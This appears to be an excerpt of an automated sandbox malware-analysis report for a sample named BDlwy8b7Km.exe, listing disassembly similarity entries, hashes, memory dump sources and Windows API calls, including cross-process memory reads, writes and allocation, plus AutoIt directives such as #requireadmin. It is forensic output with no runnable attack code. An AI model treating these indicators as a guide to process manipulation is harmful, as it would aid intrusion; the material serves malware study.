                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                  • String ID: x#f$x#f$x#f
                                                  • API String ID: 1072379062-4266588095
                                                  • Opcode ID: 87284c3fa0a506f0713a1f160fd6a56546818f3763ad99507d822049ddb3cbaf
                                                  • Instruction ID: ae3085202f16c0dd20b5d9390d4c3ceaf883993772a527096193d4fb1b9a71fe
                                                  • Opcode Fuzzy Hash: 87284c3fa0a506f0713a1f160fd6a56546818f3763ad99507d822049ddb3cbaf
                                                  • Instruction Fuzzy Hash: 3BC14C75A00106ABCB14DF58C895EFEBBBAFF48300F148069F9559B291DB70ED85CB90
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 005C8B6E
                                                  • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 005C8B7A
                                                  • __dosmaperr.LIBCMT ref: 005C8B81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                                  • String ID: .[
                                                  • API String ID: 2434981716-1428149938
                                                  • Opcode ID: 8ad66da75a239b43527828c35aed731b9dae510411922c7c42580d0b43b3478e
                                                  • Instruction ID: e6c0c90580bffbf295bf75b758bd5b24b38b8084e7a402b573483d1a21fef23e
                                                  • Opcode Fuzzy Hash: 8ad66da75a239b43527828c35aed731b9dae510411922c7c42580d0b43b3478e
                                                  • Instruction Fuzzy Hash: 7C416AB0604145AFDB249FA4CC85FBD7FA6FB85318F2885AEF88587242DE719C129790
                                                  APIs
                                                    • Part of subcall function 005FB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005F21D0,?,?,00000034,00000800,?,00000034), ref: 005FB42D
                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 005F2760
                                                    • Part of subcall function 005FB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005F21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 005FB3F8
                                                    • Part of subcall function 005FB32A: GetWindowThreadProcessId.USER32(?,?), ref: 005FB355
                                                    • Part of subcall function 005FB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,005F2194,00000034,?,?,00001004,00000000,00000000), ref: 005FB365
                                                    • Part of subcall function 005FB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,005F2194,00000034,?,?,00001004,00000000,00000000), ref: 005FB37B
                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005F27CD
                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005F281A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                  • String ID: @
                                                  • API String ID: 4150878124-2766056989
                                                  • Opcode ID: 3b5a5c429eeb7deaaab58a9fbd46fcce99350d8ad24ecdc6c92af73cf6f464cc
                                                  • Instruction ID: 741427b9915dc354f732b1b1ada207ea96beb1817acfc9d75c70649baa73f44a
                                                  • Opcode Fuzzy Hash: 3b5a5c429eeb7deaaab58a9fbd46fcce99350d8ad24ecdc6c92af73cf6f464cc
                                                  • Instruction Fuzzy Hash: 60413B7290021DAFDB10DBA4CD46AEEBBB8FF49310F108099FA55B7181DB746E45CBA1
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\BDlwy8b7Km.exe,00000104), ref: 005C1769
                                                  • _free.LIBCMT ref: 005C1834
                                                  • _free.LIBCMT ref: 005C183E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _free$FileModuleName
                                                  • String ID: C:\Users\user\Desktop\BDlwy8b7Km.exe
                                                  • API String ID: 2506810119-2321768384
                                                  • Opcode ID: 7995c119a31a41a1bc24dde454e7edfcdb18405aea65ea566da29e8ad07d322e
                                                  • Instruction ID: e0351ad8d5a66c9df757f50556ad04dac16b5b3ba5a402db07077d325d1a51c1
                                                  • Opcode Fuzzy Hash: 7995c119a31a41a1bc24dde454e7edfcdb18405aea65ea566da29e8ad07d322e
                                                  • Instruction Fuzzy Hash: 9E319F75A04608AFDB21DFD99C85E9EBFFCFB86310B14416AE404D7212D6B09A80CB94
                                                  APIs
                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 005FC306
                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 005FC34C
                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00661990,01634670), ref: 005FC395
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Menu$Delete$InfoItem
                                                  • String ID: 0
                                                  • API String ID: 135850232-4108050209
                                                  • Opcode ID: 7f2d9a961e427f6f213825e63fcc775f1ac0ef480153676f51c36f017f516d5c
                                                  • Instruction ID: d9cc4c2b6979c3e494ed833049204e7cc743402f3b1721b0abb17ed610ff9795
                                                  • Opcode Fuzzy Hash: 7f2d9a961e427f6f213825e63fcc775f1ac0ef480153676f51c36f017f516d5c
                                                  • Instruction Fuzzy Hash: BC417E3120430A9FD724DF25D944B6ABFE8BF85360F148A2DFAA5972D1D734E904CB52
                                                  APIs
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0062CC08,00000000,?,?,?,?), ref: 006244AA
                                                  • GetWindowLongW.USER32 ref: 006244C7
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 006244D7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$Long
                                                  • String ID: SysTreeView32
                                                  • API String ID: 847901565-1698111956
                                                  • Opcode ID: 32e291199dea7bf99729463f4fbba70d4902b1fdcf9051ac9f5551d1a2f8ae7b
                                                  • Instruction ID: 8bdce53d05ee5e65cf1ea6da6501b4ad2b0c6debb16bcb9ce59325a64d8f9c37
                                                  • Opcode Fuzzy Hash: 32e291199dea7bf99729463f4fbba70d4902b1fdcf9051ac9f5551d1a2f8ae7b
                                                  • Instruction Fuzzy Hash: 0231AF31200A26AFDF209E38EC45BDA7BAAEF49334F204315F975A22D0DB70EC519B50
                                                  APIs
                                                  • SysReAllocString.OLEAUT32(?,?), ref: 005F6EED
                                                  • VariantCopyInd.OLEAUT32(?,?), ref: 005F6F08
                                                  • VariantClear.OLEAUT32(?), ref: 005F6F12
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Variant$AllocClearCopyString
                                                  • String ID: *j_
                                                  • API String ID: 2173805711-2925385068
                                                  • Opcode ID: d521d88a91273c25314c4a77bdc8facbb4c17a745527851a1caa34984325b28e
                                                  • Instruction ID: 15252ac5b4c6b936158ef526eb47fd0fae345ea6588913be69d5585366d95368
                                                  • Opcode Fuzzy Hash: d521d88a91273c25314c4a77bdc8facbb4c17a745527851a1caa34984325b28e
                                                  • Instruction Fuzzy Hash: 7C31B37160425ADFDF04AF64E8549BE3FB6FF85300B140898FA024B2A1D7389952DBD0
                                                  APIs
                                                    • Part of subcall function 0061335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00613077,?,?), ref: 00613378
                                                  • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0061307A
                                                  • _wcslen.LIBCMT ref: 0061309B
                                                  • htons.WSOCK32(00000000,?,?,00000000), ref: 00613106
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                  • String ID: 255.255.255.255
                                                  • API String ID: 946324512-2422070025
                                                  • Opcode ID: db56fbbd7c2cf36c215f2873bb2ea5d4a90fc94228952d16a4c5893a0e94d6ae
                                                  • Instruction ID: 5f272110c802dd61bee3429893549bd248f6648ce5784671a8dbc2c6a68f47c9
                                                  • Opcode Fuzzy Hash: db56fbbd7c2cf36c215f2873bb2ea5d4a90fc94228952d16a4c5893a0e94d6ae
                                                  • Instruction Fuzzy Hash: BF31E7356002119FCB20CF29C586EE97BF2EF59318F28C099E9168B392D771EE85C760
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00624705
                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00624713
                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0062471A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$DestroyWindow
                                                  • String ID: msctls_updown32
                                                  • API String ID: 4014797782-2298589950
                                                  • Opcode ID: 5ca5668b32119a874a718def9d6fec1b2e7bba67ca752177031d41f5c23dcc26
                                                  • Instruction ID: d9d21dd5c7b7870c0a0e1b8d836835aa4e6ef79686b499fae8679a147ed8dbbd
                                                  • Opcode Fuzzy Hash: 5ca5668b32119a874a718def9d6fec1b2e7bba67ca752177031d41f5c23dcc26
                                                  • Instruction Fuzzy Hash: AD215EB5600619AFDB10DF64ECD5DAB3BAEEB9A3A4B040159FA149B351CB70EC11CE60
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _wcslen
                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                  • API String ID: 176396367-2734436370
                                                  • Opcode ID: 03726ad25d251a3ad604a794d224bb49632cf5ff4055ab769c7aa1cb0d86c29e
                                                  • Instruction ID: f7536d197789d628f52422206352c98f29aff3a174df33feb96396444ac27be0
                                                  • Opcode Fuzzy Hash: 03726ad25d251a3ad604a794d224bb49632cf5ff4055ab769c7aa1cb0d86c29e
                                                  • Instruction Fuzzy Hash: 3521383210492A66C731AB24DC06FBB7BDDFFD5300F104426FA49DB041EB59AD41C2D5
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00623840
                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00623850
                                                  • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00623876
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$MoveWindow
                                                  • String ID: Listbox
                                                  • API String ID: 3315199576-2633736733
                                                  • Opcode ID: f9f03b8d48a8c058b675256f019ae2b50500b674c6344dc14ea2b704a072285e
                                                  • Instruction ID: 67feeb6ff17369d5c0bce4d93671eef03f29beecf5986948c7975bb162bcf59a
                                                  • Opcode Fuzzy Hash: f9f03b8d48a8c058b675256f019ae2b50500b674c6344dc14ea2b704a072285e
                                                  • Instruction Fuzzy Hash: 5B218072610629BBEF218F54EC85EEB376BEF89760F118114F9059B290C779DC528BA0
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00604A08
                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00604A5C
                                                  • SetErrorMode.KERNEL32(00000000,?,?,0062CC08), ref: 00604AD0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$InformationVolume
                                                  • String ID: %lu
                                                  • API String ID: 2507767853-685833217
                                                  • Opcode ID: 6e45abe668c8286874f531449d40f4a61b5c9a0398fa4a38750a6b146b559cf5
                                                  • Instruction ID: 4dd4ae02ce109d2a15379984ba64008e89b3c7af9cc3a4ae5ee41ccbf270ce91
                                                  • Opcode Fuzzy Hash: 6e45abe668c8286874f531449d40f4a61b5c9a0398fa4a38750a6b146b559cf5
                                                  • Instruction Fuzzy Hash: 40314F71A00109AFDB10DF54C885EAE7BF9EF48314F148099E905DB252DB71EE46CB61
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0062424F
                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00624264
                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00624271
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: msctls_trackbar32
                                                  • API String ID: 3850602802-1010561917
                                                  • Opcode ID: a1a97aad2f28f1ba5f2664d1823b03500257cc5c3a20f6e882706a7906fb844e
                                                  • Instruction ID: fdfd5405447f0fbfb1f37873a368bd9b05062723782e6d3b0b62945cf30772d2
                                                  • Opcode Fuzzy Hash: a1a97aad2f28f1ba5f2664d1823b03500257cc5c3a20f6e882706a7906fb844e
                                                  • Instruction Fuzzy Hash: D2110631240218BEEF205F29DC06FEB3BAEEF85B64F010114FA55E6190D6B1DC219B20
                                                  APIs
                                                    • Part of subcall function 00596B57: _wcslen.LIBCMT ref: 00596B6A
                                                    • Part of subcall function 005F2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 005F2DC5
                                                    • Part of subcall function 005F2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 005F2DD6
                                                    • Part of subcall function 005F2DA7: GetCurrentThreadId.KERNEL32 ref: 005F2DDD
                                                    • Part of subcall function 005F2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 005F2DE4
                                                  • GetFocus.USER32 ref: 005F2F78
                                                    • Part of subcall function 005F2DEE: GetParent.USER32(00000000), ref: 005F2DF9
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 005F2FC3
                                                  • EnumChildWindows.USER32(?,005F303B), ref: 005F2FEB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                  • String ID: %s%d
                                                  • API String ID: 1272988791-1110647743
                                                  • Opcode ID: c4b9452cc1bd3f4dccc1b5c2f9dfed79db5accc1de3e31b9f29ce2ce40eeb780
                                                  • Instruction ID: b33e2d08a4ebb491b4b964c3589d89791404b9dd7e86b8a509f4207cde274df6
                                                  • Opcode Fuzzy Hash: c4b9452cc1bd3f4dccc1b5c2f9dfed79db5accc1de3e31b9f29ce2ce40eeb780
                                                  • Instruction Fuzzy Hash: 5B11A2B160020A6BDF14BF608C89EFD3B6ABFC4314F044075BA099B152DE74994A8B60
                                                  APIs
                                                  • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 006258C1
                                                  • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 006258EE
                                                  • DrawMenuBar.USER32(?), ref: 006258FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Menu$InfoItem$Draw
                                                  • String ID: 0
                                                  • API String ID: 3227129158-4108050209
                                                  • Opcode ID: e1245942ce0350b3cb62ed2e75f371bcc2107b3952b66c086ed1606363ee02c9
                                                  • Instruction ID: 9cc2ffc3a72e5a16bd773df5441b4fb7d09053bd4c5a3a56211c05643b45fb1b
                                                  • Opcode Fuzzy Hash: e1245942ce0350b3cb62ed2e75f371bcc2107b3952b66c086ed1606363ee02c9
                                                  • Instruction Fuzzy Hash: C801C431500618EFDB309F51EC44BEEBBBAFF45360F108099E849D6251DB308A95DF20
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
